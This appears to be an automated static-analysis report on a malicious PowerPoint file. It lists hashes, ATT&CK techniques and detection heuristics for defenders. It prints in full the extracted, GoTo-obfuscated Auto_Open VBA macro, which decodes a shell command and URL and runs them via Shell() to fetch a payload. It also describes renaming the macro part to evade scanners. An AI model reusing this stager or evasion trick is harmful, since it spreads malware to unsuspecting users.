Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 014eacfbbd11a539…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 10.1 KB
First seen: 2021-11-24
MD5: e1bff068572ee4998966250b05630f5c
SHA-1: 4abb9ed999f59c506553f553b2976f838f77856b
SHA-256: 014eacfbbd11a539e6d32617fadedf33453c8f6b9510178fe493aea50b24990f
Risk score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is an OOXML document containing a VBA project with an Auto_Open macro. This macro uses a character-shift decoding function to construct and execute a command via the Shell() function. The decoded command is likely a payload downloader, indicated by the critical heuristic firings for Shell() calls and character-shift decoding.

Heuristics (6)

  • VBA project inside OOXML [medium] (OOXML_VBA, 5 related findings)
    Document contains a VBA project; VBA macros are present. The project part has been renamed away from vbaProject.bin: ppt/ajsodkaoskdoaksd.b
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA code calls Shell().
  • VBA character-shift decoded Shell command [critical] (OLE_VBA_ASC_CHR_SHIFT_SHELL)
    The VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • VBA project part renamed to evade filename detection [high] (OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (a technique observed in the SVCReady loader).
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    The VBA project contains an Auto_Open macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2959 bytes
SHA-256: dbd85fcf3d210c554a4c8ea230247e1f4852bf97bf60c3ebff746df5b3a00e23

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Module1"
Sub Auto_Open()
Debug.Print MsgBox(qXglP77Xz("LYYVY(", "7"), vbOKCancel); returns; 1
Dim ynqvxPcX4 As String
Dim IztWb1wSm As String
Dim xrFCm28Ci As String
ynqvxPcX4 = qXglP77Xz("KBd qvlw {d{�{|mu;:dkitk6m€md66du{p|i(", "8")
IztWb1wSm = qXglP77Xz("jvvru<11yyy0dkvn{0eqo1", "2")
xrFCm28Ci = "wjdwdowdwodwdwokwdokwddj"
Debug.Print ynqvxPcX4
Debug.Print IztWb1wSm
Debug.Print xrFCm28Ci
Debug.Print (Shell(ynqvxPcX4 + IztWb1wSm + xrFCm28Ci))
End Sub
Public Function qXglP77Xz(UE2EtbVNL As String, Rb47W0TWO As Integer)
    Dim wDJHxwWIO As Integer
    For wDJHxwWIO = 1 To Len(UE2EtbVNL)

GoTo hFAdfMSltiOKKINFMd
hFAdfMSltiOKKINFMd:
GoTo piepGUqeoLGklRmrzpU:
olThGGiqDfeCTuUgasbxhsyuF:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo mtvEcQACjpIQFlhhfkVc
mQrdtwzrPtYDsMCtHRAAnaBYkygx:
GoTo BbOMGZVsOntpAD
dQpmIfDvrDTjEsBZTxz:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo RRgXZRqTwydSmdUhsb
RRgXZRqTwydSmdUhsb:
GoTo fdiFLSxKJagYwLEpQZtV
TvPuSkwlicurOyIOK:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo noJLUsZCSzFZhVBxxwAm
noJLUsZCSzFZhVBxxwAm:
        Mid(UE2EtbVNL, wDJHxwWIO, 1) = Chr(Asc(Mid(UE2EtbVNL, wDJHxwWIO, 1)) - Rb47W0TWO)
GoTo mQrdtwzrPtYDsMCtHRAAnaBYkygx
mtvEcQACjpIQFlhhfkVc:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo AbaqgjbzdHFnwmdrBkkQQy
piepGUqeoLGklRmrzpU:

PHgvoYGIdFKYiDQEqRo = "OwNzeDOIbZv"

GoTo aOOpwKmGlJbnbZTliF
aOOpwKmGlJbnbZTliF:
GoTo olThGGiqDfeCTuUgasbxhsyuF
REfBAdJcNRr:
HfAZfbnqEaclvqSjBVp = "ZENMRCvChutJ"
GoTo dQpmIfDvrDTjEsBZTxz
AbaqgjbzdHFnwmdrBkkQQy:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo oAFCNefBCLjQtJpyPX
oAFCNefBCLjQtJpyPX:
GoTo TvPuSkwlicurOyIOK
uHGQbeUuJCmTVrTYmwQ:
DsMCtHRAAnaBYkygxj = "MBys"
GoTo REfBAdJcNRr
BbOMGZVsOntpAD:
iZPdnQVJJltFiBhEQjQ = "OheAkvAxIa"
GoTo opzIDhwPkCxmSbcafPJ
opzIDhwPkCxmSbcafPJ:

wxGfLpElrKSIojk = "nYQCdOfjldCfJ"

GoTo NsnomrcVdHiTjnphHj
NsnomrcVdHiTjnphHj:
GoTo uHGQbeUuJCmTVrTYmwQ
fdiFLSxKJagYwLEpQZtV:

    Next wDJHxwWIO

GoTo OuiDtkJrreRrObpWna
OuiDtkJrreRrObpWna:
GoTo VsOntpADSopzIDhwPkCx:
hnuZmlBFHzZngQyAU:
    qXglP77Xz = UE2EtbVNL
GoTo CPMvIiiJRfGbFev
iLNtNTbQwFGE:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo hnuZmlBFHzZngQyAU
QkshMIIHLxDKcCBRH:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo CbEjhODYNESdLLyza
sgRtPOqYpbf:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo grlDAQsQJFQixSFP
CPMvIiiJRfGbFev:
GoTo wHBTCaJTaVhyNUQgDyce
vQrVuMYMJDV:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo qakqmyOPlnwTBeubhAI
grlDAQsQJFQixSFP:
LITlzHIRqkNPwCVeTz = "vtyjqNooDuw"
GoTo iLNtNTbQwFGE
VsOntpADSopzIDhwPkCx:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo rjHQPzikEhmzJ
rjHQPzikEhmzJ:
FcLQcZkBCYZiGnQgMSm = "kPKLJzsAeFqGKM"
GoTo sgRtPOqYpbf
CbEjhODYNESdLLyza:
NqUSApJArEPyxllM = "hJdIgyKywq"
GoTo vQrVuMYMJDV
wHBTCaJTaVhyNUQgDyce:
knHkoCyivUUwEQtMsP = "HitFpLv"
GoTo QkshMIIHLxDKcCBRH
qakqmyOPlnwTBeubhAI:
eGlVRFaQHVgONBoOlx = "tKxBbOMG"
GoTo SbcafPJQuHGQ
SbcafPJQuHGQ:

End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project part ppt/ajsodkaoskdoaksd.b
Size: 19968 bytes
SHA-256: 0bcbade375f4f1ed1a73a31f526e24ee8bf3ee9def17a5b031dec64df5bd4039